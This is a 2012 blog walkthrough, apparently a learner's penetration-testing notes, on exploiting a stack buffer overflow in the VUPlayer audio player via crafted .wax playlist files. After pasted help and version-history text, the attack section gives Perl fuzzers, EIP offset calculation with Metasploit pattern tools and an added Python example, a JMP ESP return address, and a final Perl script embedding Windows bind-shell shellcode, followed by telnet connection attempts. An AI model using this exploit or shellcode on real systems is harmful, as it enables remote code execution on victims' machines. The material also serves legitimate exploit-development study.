Monday, 13 February 2012

Exploiting VUPlayer (Stack-Based Overflow)

Before exploitation, we must do information gathering.
Why? Because we want to learn about our target: how the application takes input and how it processes files. Now I will try this with VUPlayer...
I. Information Gathering

  a. Information about VUPlayer can be found in the application's Help > Contents.
From there I get a lot of information, like this:

VUPlayer is a freeware multi-format audio player for Windows
supporting the following formats:

>>> Introduction

MOD • Sound/Noise/ProTracker
MTM • MultiTracker
S3M • ScreamTracker
XM • FastTracker
IT • ImpulseTracker
MO3 • MO3 Packer
MP3 • MPEG Audio
MP4 • QuickTime MPEG-4 (AAC/Apple Lossless)
MPC • Musepack
OGG • Ogg Vorbis
FLAC • Free Lossless Audio Codec
APE • Monkey's Audio
WV • WavPack
AIFF • Audio Interchange File Format
WMA • Windows Media Audio
WAV • Windows PCM/ACM
MIDI • Musical Instrument Digital Interface
CD • Audio CD

Features include:

• gapless playback •
• MP3/OGG/WMA internet file streaming •
• optional 32-bit mixing •
• 9-band graphic equalizer •
• volume, balance & pitch controls •
• full system tray functionality •
• timer playback/screen saver feature •
• configurable system-wide hotkeys •
• support for multiple visuals via a plug-in system •
• digital audio extraction •
• encoding to Ogg Vorbis, FLAC, APE, WMA & WV formats •
• Audioscrobbler support •
• remote freedb support •
• CD-Text support •

System requirements:

Microsoft Windows 95, 98, ME, NT, 2000, XP or Vista
Microsoft DirectX version 3 or later
32-bit mixing requires WDM audio drivers
Graphic EQ requires DirectX 8 (version 9 required for 32-bit mixing)
Windows Media Audio support requires Windows Media Player version 9 or later
QuickTime MPEG-4 support requires QuickTime version 7 or later
MIDI support requires a SoundFont
Audioscrobbler & freedb functionality requires an internet connection
Audio CD support requires Windows NT, 2000, XP or Vista
CD-Text support requires Windows XP or Vista

>>> File Menu

• Add URL
Adds an internet file stream to the current playlist. The address should begin with either "http://" or "ftp://".

>>> Option

• Buffer Length
Select the size of the output buffer. Using a shorter buffer length decreases latency, but could lead to occasional sound break up on older systems.


  •  Enable Audioscrobbler
Select this to enable Audioscrobbler functionality. Audioscrobbler builds a profile of your musical taste by sending the name of every song you play to the Audioscrobbler server. For more information on this service, please visit the Audioscrobbler website.


- Username
Your Audioscrobbler username.

- Password
Your Audioscrobbler password.

- Clear Log
Clear the Audioscrobbler log file.

- View Log
View the Audioscrobbler log file.



>>> Version History

>>> Open information from the application's installation

From there we get the same information.
VUPlayer v2.49
Copyright (C) 2000-2007 James Chapman
------------------------------------------------------------------------------
website: http://www.vuplayer.com
email: james@vuplayer.com
------------------------------------------------------------------------------

Overview
--------
VUPlayer is a freeware multi-format audio player for Windows

Supported formats:

MOD Sound/Noise/ProTracker
MTM MultiTracker
S3M ScreamTracker
XM FastTracker
IT ImpulseTracker
MO3 MO3 Packer
MP3 MPEG Audio
MP4 QuickTime MPEG-4 (AAC/Apple Lossless)
MPC Musepack
OGG Ogg Vorbis
FLAC Free Lossless Audio Codec
APE Monkey's Audio
WV WavPack
AIFF Audio Interchange File Format
WMA Windows Media Audio
WAV Windows PCM/ACM
MIDI Musical Instrument Digital Interface
CD Audio CD

Features include:

- gapless playback
- MP3/OGG/WMA internet file streaming
- optional 32-bit mixing
- 9-band graphic equalizer
- volume, balance & pitch controls
- full system tray functionality
- timer playback/screen saver feature
- configurable system-wide hotkeys
- support for multiple visuals via a plug-in system
- digital audio extraction
- encoding to Ogg Vorbis, FLAC, APE, WMA & WV formats
- Audioscrobbler support
- remote freedb support
- CD-Text support


System requirements
-------------------
Microsoft Windows 95, 98, ME, NT, 2000, XP or Vista.
Microsoft DirectX version 3 or later.
32-bit mixing requires WDM audio drivers.
Graphic EQ requires DirectX 8 (version 9 required for 32-bit mixing).
Windows Media Audio support requires Windows Media Player version 9 or later.
QuickTime MPEG-4 support requires QuickTime version 7 or later.
MIDI support requires a SoundFont.
Audioscrobbler & freedb functionality requires an internet connection.
Audio CD support requires Windows NT, 2000, XP or Vista.
CD-Text support requires Windows XP or Vista.


Troubleshooting
---------------
If problems occur running VUPlayer on Windows 95/98/NT systems,
please consult the following Microsoft Knowledge Base article
for details on how to update necessary system components:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q259403


Command Line Options
--------------------
VUPlayer <filename>
- loads VUPlayer with the specified file/folder and starts playback

VUPlayer -add <filename>
- loads VUPlayer with the specified file/folder
- if VUPlayer is already open, adds file/folder to the current playlist

VUPlayer -vpl <playlist>
- loads VUPlayer with the specified playlist

VUPlayer -cd <X:\>
- loads VUPlayer with drive X selected

VUPlayer -cd <X:\trackNN.cda>
- loads VUPlayer with track NN on drive X selected


ATI Remote Wonder Plug-In (vu_ammo.dll)
---------------------------------------
This plug-in supports the Play, Volume & Cursor key groups (Cursor
Up/Left maps to Previous Track, Cursor Down/Right maps to Next Track).
The programmable keys A-F can also be used for the Stop at Track End,
Volume Fade Out and Change Current Tab functions.


Credits
-------
Main program is Copyright (C) 2000-2007 James Chapman
http://www.vuplayer.com

BASS library is Copyright (C) 1999-2007 Ian Luck
http://www.un4seen.com

Ogg Vorbis is Copyright (C) 1994-2007 Xiph.Org Foundation
http://www.vorbis.com

FLAC is Copyright (C) 2000-2007 Josh Coalson
http://flac.sourceforge.net

Monkey's Audio is Copyright (C) 2000-2007 Matthew T. Ashland
http://www.monkeysaudio.com

WavPack is Copyright (C) 1998-2007 Conifer Software
http://www.wavpack.com

Musepack is Copyright (C) 2007 Musepack Development Team
http://www.musepack.net

QuickTime is Copyright (C) 2007 Apple Computer, Inc
http://www.apple.com/quicktime/

Portions utilize Microsoft Windows Media Technologies
Copyright (C) 1999-2007 Microsoft Corporation
All Rights Reserved
http://www.microsoft.com/windowsmedia/

Audioscrobbler is Copyright (C) 2002-2007 Audioscrobbler.com 
http://www.audioscrobbler.com

freedb is Copyright (C) 2000-2007 freedb.org
http://www.freedb.org


Usage, Distribution & Legal Stuff
---------------------------------
VUPlayer is freeware and may be freely used for any purpose.
Redistribution of the program must be done on a non-commercial
basis, and the entire contents of the archive must be maintained.

This program is provided as-is and is free for your own use.
Whilst every attempt has been made to ensure that the software is
free of problems, the developer offers no warranty for it, and
cannot accept responsiblity for any problems it may cause.


History
-------
· version 2.49 (18 September 2007) ·
updated to libvorbis 1.2.0, libFLAC 1.2.1 & WavPack 4.41
updated to version 2.3.0.3 of the BASS library

· version 2.48 (24 March 2007) ·
updated the Ogg Vorbis encoder to aoTuV Release 1
fixed a few minor bugs

· version 2.47 (28 February 2007) ·
added MIDI support via BASSMIDI
added a MOD interpolation option
switched to using BASSWMA for WMA decoding
updated to version 1.1.4 of libFLAC
fixed a couple of Windows 98 related bugs

· version 2.46 (25 January 2007) ·
updated to version 2.3.0.2 of the BASS library
updated to version 4.4 of WavPack
updated to version 1.2.4 of libmpcdec
updated the main program icon (finally)

· version 2.45 (3 December 2006) ·
updated to version 1.1.3 of libFLAC

· version 2.44 (26 August 2006) ·
new French language interface (thanks to Frédérick)
fixed a problem with ID3v2 tags

· version 2.43 (25 June 2006) ·
added AIFF playback support
added cue sheet support
updated to version 2.3 of the BASS library
updated to version 7 of the QuickTime API

· version 2.42 (11 February 2006) ·
fixed a problem with 8-bit WAV files
added support for mixed APE/ID3v1 tags
updated to version 1.1.2 of libvorbis
updated to version 4.31 of WavPack

· version 2.41 (8 October 2005) ·
updated to version 2.2 of the BASS library

· version 2.4 (19 April 2005) ·
added a balance control
added a 96000Hz sample rate option
added some extra buffer length options
added an option to autosave playlists
added a spectrum analyser display style
added read only ID3v2.3 tag support for MP3 & MPC files
added APE tag support for MP3, MPC & WavPack files
added Audioscrobbler support
added Musepack playback support
improved gapless playback support
updated the VU Meter plug-in
updated to version 1.1.2 of the FLAC libraries
fixed the counter to cope with altered pitch settings
added a new mystery bonus feature
added a WavPack encoder
updated the Windows Media Audio encoder

· version 2.3 (17 December 2004) ·
updated to version 2.1 of the BASS library
added MTM/MO3 support
added a preamp to the graphic equalizer
added a track number column to the playlist
added an extra filetype icon for XP users
various minor updates and fixes

· version 2.23 (13 October 2004) ·
added WavPack playback support
updated to version 1.1.0 of the Vorbis libraries
updated to version 1.1.1 of the FLAC libraries
fixed a memory leak in the file converter

· version 2.22 (9 August 2004) ·
included a new solidscope plugin
added an internal volume control option
added a special mystery bonus feature
fixed a QuickTime playback bug

· version 2.21 (30 June 2004) ·
fixed a bug with the Add File(s) function
altered the behaviour of the Fade to Next Track function

· version 2.2 (12 May 2004) ·
added QuickTime MPEG-4 (AAC/Apple Lossless) playback support
added Monkey's Audio playback & encoding support
added a delete file function
changed the WAV file writer into a transcoder
updated to freedb protocol level 6
started using UTF-8 for OGG/FLAC/APE/MP4 tagging

· version 2.11 (14 March 2004) ·
new Dutch language interface (thanks to Sander)

· version 2.11 (3 March 2004) ·
new German language interface (thanks to Stefan)
fixed a CD-Text bug, along with some other minor updates

· version 2.1 (5 February 2004) ·
implemented a WAV file writer
added support for RIFF text chunks in WAV files
new Swedish language interface (thanks to Marcus)
started using NSIS for the installer

· version 2.03 (9 December 2003) ·
split the program into separate language builds

· version 2.02 (28 November 2003) ·
fixed a couple of OGG/FLAC tag editing bugs

· version 2.01 (26 November 2003) ·
updated to version 1.01 of the Ogg Vorbis libraries

· version 2.0 (14 November 2003) ·
added a level-based crossfader
added custom file naming to the audio extraction feature
improved Audio CD playback performance
replaced the keyboard hook with configurable system-wide hotkeys
new Spanish language interface (thanks to Vicente)
new Italian language interface (thanks to Lorenzo)
updated to version 2.0 of the BASS library
started using UPX to pack the program

· version 1.9 (2 September 2003) ·
new mini control plug-in
added gapless WMA playback
added always on top and drag & drop functionality to the visuals
added support for folders on the command line

· version 1.8 (26 July 2003) ·
added support for MP3/OGG internet file streaming
fixed length calculation for MP3 files with VBRI headers

· version 1.7 (23 June 2003) ·
fixed an Audio CD recognition bug
re-enabled Audio CD support for Windows NT systems

· version 1.6 (1 June 2003) ·
added Windows Media Audio 9 Professional encoding options
added a manual refresh option to the CD drive menu
removed the limit on the maximum playlist size

· version 1.5 (25 May 2003) ·
a help file has finally been compiled
enabled FLAC tag editing
enabled freedb data submissions
shifted configuration settings to the registry
fixed a few issues related to multi-user environments

· version 1.4 (4 May 2003) ·
new CD ripping feature with a plug-in encoder system
added Ogg Vorbis, FLAC & Windows Media Audio 9 encoders
added remote freedb support for disc information retrieval
improved support for Audio CDs with a 'hidden track 0'
fixed a cmdline startup bug

· version 1.3 (29 March 2003) ·
new 32-bit mixing option (requires WDM audio drivers)
new 9-band graphic equalizer (requires DirectX 8 or later)
rearranged the main window layout
added support for multiple visuals via a new plug-in system
added CD-Text support for Windows XP systems
added FLAC support
added a playlist repeat feature
added an option to remember the last playback position on exit
various minor updates and enhancements

· version 1.2 (10 January 2003) ·
updated the Windows Media Audio 9 decoder
fixed M3U playlist loading
fixed a bug with Audio CD file type registration
included a plug-in for the ATI Remote Wonder

· version 1.1 (15 December 2002) ·
added DAE based Audio CD playback for Windows NT/2000/XP systems

· version 1.05 (3 September 2002) ·
added skip forwards/backwards functions
included a new jump to track feature
fixed an ogg vorbis loading bug
updated to BASS 1.6 (spectrum analyser now uses a stereo FFT)

· version 1.04 (13 August 2002) ·
new keyboard hook feature for background monitoring of function keys
added hot key support for enhanced keyboards
added mute volume & volume up/down functions
removed the dependency on multimedia timers
updated ogg vorbis code to version 1.0
shuffled WMA code off into a separate library
the usual round of minor updates and bugfixes

· version 1.01 (3 March 2002) ·
minor update to improve support for badly formatted MP3 files

· version 1.0 (27 January 2002) ·
split the program into two versions, standard & full
windows media audio playback is included in the full version
both versions are now supplied with a full installer
gapless ogg vorbis playback is now an option
random playback has been improved slightly

· version 0.9 (1 January 2002) ·
ogg vorbis support has been updated to RC3
ogg vorbis comment editing has been added
timer playback has been copied over from my other cd program
support for Windows XP visual styles
compatibility fix for Windows 95/95a systems

· version 0.8 (14 October 2001) ·
added full system tray functionality
included a new 'add folder' function to scan for music files
a new spectrum analyser display style has been added
improved sorting by using a stable 2-pass shell sort method
it is now possible to show/hide the volume controls

· version 0.7 (27 July 2001) ·
the main program window is now fully resizable
the playlist display can now be customized (font & colour)
it is now possible to show, hide and reorder columns
extra categories have also been added to the playlist
the maximum playlist size has been increased to 10000 entries
added 'start playback on program launch/playlist open' options
included a new 'add to playlist' command line/shell option
MP2 file format support has been added
surround sound modes have been shifted to the options screen
some new volume ramping options for MOD/S3M/XM/IT files
soundcard tone & balance controls have been added
the BASS library has been updated to version 1.0
ogg vorbis support has been updated to RC2 (14 August 2001)
tracked down some bugs to improve general program stability

· version 0.6 (28 May 2001) ·
the BASS library has been updated to version 0.9
(improved MPEG support and new MOD surround sound modes)
added 'volume fade out' and 'stop at track end' options
added M3U playlist loading (not extensively tested)

· version 0.5 (16 April 2001) ·
minor update to include a new oscilloscope display style
updated the example source code (see website for details)

· version 0.4 (22 March 2001) ·
added ogg vorbis support (no comment editing yet though)
improved support for MP3 files

· version 0.3 (9 February 2001) ·
fixed the problem on WindowsNT/2000
(this was due to a stuck GlobalDeleteAtom loop which
should have caused the program to fail on Win98 as well)
added 25/50fps right-click menu on the VU Meters
right click also centres the Mixing & Panning sliders
some more general bugfixes

· version 0.2 (8 January 2001) ·
file type registration has been added
track repeat and random play have been added
numerous bugfixes 

· version 0.1 (10 October 2000) ·
initial release of the program

Passive information gathering via the Internet

------------------------------------------------------------------------------

II. SERVICE ENUMERATION

From this I have the following information:
  a. The application supports many file formats
       For example: MP3, WAV, etc.
  b. Internet file streaming
  c. Buffer length
  d. Username & password

III. VULNERABILITY IDENTIFICATION

Based on experience, we can try to create a fuzzer for a format the application supports, for example WAV, and we will also try to overwrite through the file-stream (streaming file) input.

If that doesn't work, we can try other ways.

IV. EXPLOITATION

      I will try to make a fuzzer that overflows the application by sending 1000 characters.

a. Make a fuzzer with Perl


use strict;
use warnings;

my $file="music.wax";
my $buffer="\x41" x 3000;   # 3000 'A' bytes
open (my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE "$file.$buffer";  # inside double quotes the dot is a literal byte, not concatenation
close ($FILE);
print "created\n";

root@justview:~# perl aa.perl
Copy the result to the Windows machine and load it in the player; we can see the application crash.

b. We run the application under OllyDbg.
We can see that with 3000 characters the application crashes.

c. Split the buffer into 1000 A's followed by 2000 B's:

use strict;
use warnings;

my $file="music.wax";
my $buffer="\x41" x 1000;    # 1000 'A' bytes
my $buffer2="\x42" x 2000;   # 2000 'B' bytes
open (my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE "$file.$buffer.$buffer2";  # dots inside the quotes are literal bytes
close ($FILE);
print "created\n";

EIP is 424242, so we know the bytes that reach EIP lie between offsets 1000 and 2000. Now create structured dummy data:
root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > string_pattern.txt
After creating it we can open the file:
root@justview:/pentest/exploits/framework/tools# kwrite string_pattern.txt 
and it shows:


Create the file, copy it to your Windows machine, then run the application and load the file. Look at the result.

Now, because the data is structured, we can work out where the EIP value (61413061) came from. Next we calculate the offset from the EIP register value:

root@justview:/pentest/exploits/framework/tools# ./pattern_offset.rb  61413061
result: 1

1 is the offset within the pattern needed to overwrite EIP. So if you create a file with 1000+1 = 1001 A's and then add 4 B's (42 42 42 42 in hex), EIP should contain 42 42 42 42. We also know that ESP points at data from our buffer, so we'll add some C's after overwriting EIP.
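The offset calculation above, as an added example that is neither the blog's own script nor the source of Metasploit's pattern_create.rb / pattern_offset.rb: it rebuilds the same cyclic pattern and shows why the EIP value 61413061 read from the debugger maps to offset 1 inside the pattern, and therefore to 1001 in the file once the 1000-byte 'A' prefix is counted. The function names (cyclic_pattern, pattern_offset, eip_offset_in_file) are my own, and the input values are the ones from the post.

```python
"""Crash triage: map an EIP value back to an offset in a cyclic pattern.

Added example, not the blog author's code and not Metasploit's own source.
It reproduces what pattern_create.rb / pattern_offset.rb do so the reader
can see where the 'result: 1' above comes from.
"""
import string
import struct
from typing import Optional


def cyclic_pattern(length: int) -> bytes:
    """Build the Metasploit-style 'Aa0Aa1Aa2...' pattern truncated to length.

    Every 4-byte window is unique for the first 20280 bytes, which is what
    lets a 32-bit crash value map back to exactly one position.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int) -> Optional[int]:
    """Return the pattern offset whose 4 bytes landed in EIP, or None.

    The debugger shows EIP as a 32-bit number; on x86 it was loaded
    little-endian from the stack, so unpack it that way first. Like
    pattern_offset.rb, fall back to the byte-reversed reading.
    """
    pattern = cyclic_pattern(length)
    for chunk in (struct.pack("<I", eip_value), struct.pack(">I", eip_value)):
        idx = pattern.find(chunk)
        if idx != -1:
            return idx
    return None


def eip_offset_in_file(prefix_len: int, eip_value: int, pattern_len: int) -> Optional[int]:
    """Offset of the saved return address from the start of the whole buffer.

    The post's second test file carried 1000 'A' bytes followed by the
    2000-byte pattern, so the file offset is prefix_len plus the offset
    found inside the pattern. Returns None when EIP is not from the pattern.
    """
    inner = pattern_offset(eip_value, pattern_len)
    return None if inner is None else prefix_len + inner


if __name__ == "__main__":
    # Values from the post: EIP = 0x61413061 after a 1000-byte prefix and a 2000-byte pattern.
    print("offset in pattern:", pattern_offset(0x61413061, 2000))           # 1
    print("offset in file:   ", eip_offset_in_file(1000, 0x61413061, 2000))  # 1001
    # A value that is not from the pattern (the 'BBBB' test) yields None.
    print("BBBB in pattern:  ", pattern_offset(0x42424242, 2000))           # None
```

Reading 0x61413061 little-endian gives the bytes "a0Aa", which first occur at index 1 of "Aa0Aa1Aa2...", so the pattern_offset.rb output of 1 and the author's 1000+1 = 1001 follow directly. A None result is the signal that the crash value did not come from the controlled buffer at all.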

Let's try. Modify the Perl script to create the new m3u file.

use strict;
use warnings;

my $file="hajar.wax";
my $buffer="\x41" x 1001;        # 1001 'A' bytes up to the saved return address
my $eip="\x42\x42\x42\x42";      # 'BBBB' should land in EIP
my $espdata="\x90" x 1000;       # filler that ESP should point into
open (my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE "$file.$buffer.$eip.$espdata";  # dots inside the quotes are literal bytes
close ($FILE);
print "created\n";

Result:


EIP = 424242, i.e. BBBB

d.       We control EIP. So we can point EIP somewhere else, to a place that contains our own code (shellcode). But where is this space, how can we put our shellcode at that location, and how can we make EIP jump there?

Remember the JMP ESP from the WarFTP exploit?
1. Run the application under OllyDbg. In the View menu choose Executable modules.

2. The executable modules will be shown.
3. Choose a library to serve as the springboard that sends EIP into the stack; we will choose shell32.dll.


4. After choosing the library, double-click it and a new CPU window for that library will open.




5. The next step is to search for JMP ESP in that file.
       Right-click ------> Search for ----> Command, and it shows:

6. Enter JMP ESP in the command box and press Find.



Preparing the payload using Metasploit


After running msfweb,

open a browser at http://127.0.0.1:55555/PAYLOADS



In the filter, choose os :: win32,
then Windows bind shell;
configure it like this and click Generate.



use strict;
use warnings;

my $file="dor.wax";
my $buffer="\x41" x 1001;          # 1001 'A' bytes up to the saved return address
my $eip=pack('V',0x7C9D30D7);      # JMP ESP address, packed little-endian
my $shellcode="\x90" x 25;         # NOP sled before the generated payload
$shellcode=$shellcode."\x29\xc9\xdb\xdb\xbe\x16\xc3\x6f\x9c\xb1\x51\xd9\x74\x24\xf4\x5f".
"\x31\x77\x15\x03\x77\x15\x83\xf9\x3f\x8d\x69\xf9\xaa\xb9\xdf\xe9".
"\xd2\xc1\x1f\x16\x44\xb5\x8c\xcc\xa1\x42\x09\x30\x21\x28\x97\x30".
"\x34\x3e\x1c\x8f\x2e\x4b\x7c\x2f\x4e\xa0\xca\xa4\x64\xbd\xcc\x54".
"\xb5\x01\x57\x04\x32\x41\x1c\x53\xfa\x88\xd0\x5a\x3e\xe7\x1f\x67".
"\xea\xdc\xf7\xe2\xf7\x96\x57\x28\xf9\x43\x01\xbb\xf5\xd8\x45\xe4".
"\x19\xde\xb2\x19\x0e\x6b\xcd\x71\x6a\x77\xaf\x4a\x43\x5c\x4b\xc7".
"\xe7\x52\x1f\x97\xeb\x19\x6f\x0b\x59\x96\xd0\x3b\xff\xc1\x5e\x75".
"\xf1\xfd\x0f\x76\xdb\x98\xfc\xee\x8c\x57\x31\x86\x3b\xeb\x07\x09".
"\x90\xf4\xb8\xdd\xd3\xe6\xc5\x26\xb4\x07\xe3\x07\xbd\x1d\x6a\x36".
"\x50\xd5\x71\x6d\xc1\xe4\x8a\x5d\x7d\x30\x7d\xa8\xd3\x95\x81\x84".
"\x7f\x49\x2d\x7b\xd3\x2e\x82\x38\x80\x4f\xf4\xd8\x4e\xa1\xa9\x42".
"\xdc\x48\xb0\x1f\x8a\xee\x29\x6f\x8c\xb8\xb2\x59\x78\x57\x1c\x30".
"\x82\x87\xf6\x1e\xd1\x06\xee\x09\xd5\x81\xa3\xe0\xd6\xfe\x2c\xef".
"\x60\x79\xe5\xb8\x8d\x53\xa6\x12\x26\x09\xb8\x4a\x55\xd9\xa1\x13".
"\x9c\x63\x79\x1c\xf6\xc1\x7a\x32\x91\x83\xe0\xd4\x36\x37\x84\x91".
"\x22\xdd\x06\xf8\x85\xee\x2e\x1d\xbf\xaa\xb9\x03\x71\xf3\x49\x69".
"\x8c\xb1\x80\x93\x33\x1a\x48\xe6\xce\x5a\xc5\x53\x85\xf3\x6b\x5d".
"\x69\x15\x73\xd4\xca\xe5\x5d\x4d\x84\x4b\x33\x20\x7b\x06\xb2\x93".
"\x2a\x83\xe5\xec\x1d\x43\xab\xcb\x9b\x5a\xe0\x14\x75\x08\xf8\x15".
"\x4d\x32\xd6\x62\xe5\x30\x54\xb0\x6e\x36\x8d\x6a\x90\x18\x5a\x7a".
"\xe4\x9d\xc4\x29\x06\x4b\x05\x1d";
open (my $FILE, ">", $file) or die "cannot open $file: $!";
print $FILE "$file.$buffer.$eip.$shellcode";  # dots inside the quotes are literal bytes
close ($FILE);
print "created\n";

The program crashes, but I cannot connect remotely.

When I try telnet 192.168.56.101 4444,
the result:

to be continued...

I have tried several ways but I get the same result..

Just now I got a result.
But after I try telnet, I get this result:

root@justview:~# telnet 192.168.56.101 4444
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
Connection closed by foreign host.

I don't know what is wrong, but I tried again following the approach of the WarFTP exploit, in Python. Finally I got a result:

But in this case I used a JMP ESP from BASSWMA.
